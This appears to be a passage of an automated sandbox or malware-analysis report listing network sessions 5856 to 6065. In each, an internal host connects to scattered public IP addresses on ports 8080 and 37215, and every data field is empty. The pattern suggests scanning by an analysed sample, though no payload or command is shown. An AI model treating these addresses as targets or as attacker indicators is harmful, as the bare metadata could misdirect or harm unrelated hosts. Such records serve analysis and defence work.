
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5856192.168.2.2336568182.96.38.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5857192.168.2.2357224159.19.234.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5858192.168.2.2349198221.211.104.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5859192.168.2.2337036173.201.151.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5860192.168.2.2355576137.36.125.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5861192.168.2.234972647.163.104.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5862192.168.2.2353784124.252.131.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5863192.168.2.235722085.33.133.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5864192.168.2.2333792107.173.18.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5865192.168.2.233704449.135.69.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5866192.168.2.2348808131.201.10.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5867192.168.2.234118251.8.74.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5868192.168.2.235630289.168.133.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5869192.168.2.2347230186.160.62.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5870192.168.2.2357244197.158.149.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5871192.168.2.2356088188.133.65.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5872192.168.2.2338190124.233.35.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5873192.168.2.2339566177.41.37.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5874192.168.2.2357676168.11.72.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5875192.168.2.235830864.45.123.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5876192.168.2.2350838173.1.14.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5877192.168.2.235529297.241.246.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5878192.168.2.233954285.83.214.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5879192.168.2.2336604135.61.129.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5880192.168.2.2350954222.95.196.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5881192.168.2.2346466164.121.116.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5882192.168.2.234748417.56.121.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5883192.168.2.2351802129.85.176.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5884192.168.2.2348954200.242.178.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5885192.168.2.233600289.213.156.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5886192.168.2.2340956195.192.223.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5887192.168.2.235849842.168.220.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5888192.168.2.2360546145.229.128.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5889192.168.2.2339446130.255.220.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5890192.168.2.235775420.39.102.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5891192.168.2.234124823.203.56.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5892192.168.2.2353668170.160.225.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5893192.168.2.235336018.31.106.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5894192.168.2.233723285.244.12.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5895192.168.2.2346280207.33.229.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5896192.168.2.2356550204.206.213.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5897192.168.2.236057071.21.116.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5898192.168.2.2340480162.102.9.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5899192.168.2.2354090171.132.73.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5900192.168.2.2345966183.60.140.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5901192.168.2.235403271.253.248.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5902192.168.2.2349356161.214.233.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5903192.168.2.23397429.220.25.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5904192.168.2.2333432134.196.177.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5905192.168.2.2333962151.206.236.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5906192.168.2.235415847.105.87.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5907192.168.2.234299619.187.224.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5908192.168.2.234409047.145.47.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5909192.168.2.2356078221.226.241.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5910192.168.2.2344160123.116.139.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5911192.168.2.2346190170.14.148.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5912192.168.2.2360258147.42.10.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5913192.168.2.2357148206.116.248.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5914192.168.2.2336000167.16.29.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5915192.168.2.2353854165.237.125.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5916192.168.2.2345736192.237.194.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5917192.168.2.235783492.197.206.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5918192.168.2.234571689.45.150.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5919192.168.2.233918613.171.134.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5920192.168.2.235512068.124.163.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5921192.168.2.235991880.182.145.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5922192.168.2.2350454175.99.138.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5923192.168.2.2360642150.209.183.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5924192.168.2.2355342213.41.202.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5925192.168.2.2360898155.243.3.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5926192.168.2.2353380174.120.126.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5927192.168.2.2342272121.75.196.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5928192.168.2.233793062.234.174.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5929192.168.2.235017289.220.145.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5930192.168.2.2360338166.46.40.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5931192.168.2.2350972161.62.32.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5932192.168.2.234701647.233.72.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5933192.168.2.2352506147.38.105.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5934192.168.2.235583494.140.34.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5935192.168.2.2358458100.144.60.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5936192.168.2.233585831.55.152.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5937192.168.2.2349430210.239.108.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5938192.168.2.233386496.212.224.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5939192.168.2.2336300192.90.133.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5940192.168.2.235389259.215.217.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5941192.168.2.2334878153.175.145.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5942192.168.2.235373260.238.165.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5943192.168.2.2354582149.124.187.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5944192.168.2.235392865.174.190.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5945192.168.2.235306035.222.118.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5946192.168.2.2340080151.168.202.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5947192.168.2.2346900126.24.232.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5948192.168.2.2341212198.49.110.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5949192.168.2.2338482157.45.57.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5950192.168.2.2336396157.93.14.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5951192.168.2.2343498220.50.228.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5952192.168.2.2359634157.217.12.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5953192.168.2.2335724157.123.114.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5954192.168.2.234078041.203.208.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5955192.168.2.2349198109.163.132.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5956192.168.2.2337556193.147.97.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5957192.168.2.233285441.2.187.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5958192.168.2.234186241.39.154.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5959192.168.2.233761041.47.234.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5960192.168.2.233492441.67.21.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5961192.168.2.2348748197.160.38.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5962192.168.2.2352388219.227.20.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5963192.168.2.233569494.181.217.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5964192.168.2.233692048.85.207.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5965192.168.2.2359008101.55.144.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5966192.168.2.2350724197.67.205.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5967192.168.2.234882641.121.135.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5968192.168.2.2335972197.44.187.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5969192.168.2.234360441.118.202.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5970192.168.2.2349388157.240.203.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5971192.168.2.234999441.115.60.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5972192.168.2.2343280197.183.232.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5973192.168.2.2355706197.103.137.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5974192.168.2.2351712197.230.80.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5975192.168.2.2353002157.194.248.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5976192.168.2.2337884157.171.78.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5977192.168.2.2355556197.174.103.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5978192.168.2.2345812197.198.252.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5979192.168.2.2351510118.248.174.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5980192.168.2.235427841.224.100.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5981192.168.2.233543263.189.172.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5982192.168.2.234185838.103.254.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5983192.168.2.233733089.26.32.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5984192.168.2.233649041.212.74.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5985192.168.2.235725441.120.240.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5986192.168.2.2337826157.32.11.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5987192.168.2.234257441.167.107.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5988192.168.2.2349976137.243.192.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5989192.168.2.234760462.51.114.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5990192.168.2.233821288.219.103.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5991192.168.2.233455691.119.110.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5992192.168.2.233475299.180.75.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5993192.168.2.234620441.166.170.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5994192.168.2.235296441.49.221.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5995192.168.2.2352584157.241.199.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5996192.168.2.233503441.189.69.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5997192.168.2.236048874.72.249.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5998192.168.2.235092841.98.254.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5999192.168.2.235758472.226.96.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6000192.168.2.233760841.114.112.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6001192.168.2.2339274197.120.68.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6002192.168.2.234118241.20.94.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6003192.168.2.2341836222.15.23.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6004192.168.2.2355596157.190.155.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6005192.168.2.23434924.97.233.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6006192.168.2.2335408128.20.227.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6007192.168.2.2340932197.26.121.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6008192.168.2.2351178197.20.84.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6009192.168.2.234043098.244.148.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6010192.168.2.2333844157.134.252.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6011192.168.2.234300896.60.102.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6012192.168.2.2360028197.35.223.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6013192.168.2.235381041.157.74.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6014192.168.2.2358906201.105.20.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6015192.168.2.235116071.7.221.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6016192.168.2.2354640157.11.208.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6017192.168.2.2356942146.127.128.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6018192.168.2.2337366157.184.156.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6019192.168.2.2342116204.134.223.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6020192.168.2.2359352157.104.68.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6021192.168.2.2357994197.92.53.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6022192.168.2.234698052.49.134.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6023192.168.2.2334322157.218.1.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6024192.168.2.235624054.209.121.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6025192.168.2.234920897.16.110.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6026192.168.2.2339458109.41.229.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6027192.168.2.2336872197.254.18.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6028192.168.2.2345398112.196.216.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6029192.168.2.2334930157.11.98.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6030192.168.2.233813241.167.218.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6031192.168.2.235931041.252.80.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6032192.168.2.2344432115.17.10.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6033192.168.2.235677841.171.170.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6034192.168.2.2338234197.140.10.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6035192.168.2.2353856200.82.201.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6036192.168.2.23409969.71.176.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6037192.168.2.2337360162.20.225.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6038192.168.2.2344214197.169.64.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6039192.168.2.235240041.61.86.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6040192.168.2.2338574157.129.200.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6041192.168.2.235219235.154.104.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6042192.168.2.2344678158.222.219.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6043192.168.2.234383044.135.117.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6044192.168.2.2341056197.235.16.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6045192.168.2.2351206197.121.222.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6046192.168.2.234488241.132.208.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6047192.168.2.2339512197.130.35.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6048192.168.2.2357948197.49.104.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6049192.168.2.2345128197.36.227.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6050192.168.2.2336840157.169.125.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6051192.168.2.2348092197.45.179.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6052192.168.2.2342250197.249.226.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6053192.168.2.2358384157.204.35.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6054192.168.2.2332962197.132.46.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6055192.168.2.2360814197.24.91.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6056192.168.2.2352866197.190.104.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6057192.168.2.234094241.222.5.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6058192.168.2.2345682157.230.68.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6059192.168.2.2342742157.237.185.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6060192.168.2.2360450157.142.86.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6061192.168.2.2345004100.33.139.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6062192.168.2.2355364221.208.29.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6063192.168.2.234020041.198.143.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6064192.168.2.235780041.125.242.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6065192.168.2.2332788196.234.171.1737215
                                                        TimestampBytes transferredDirectionData


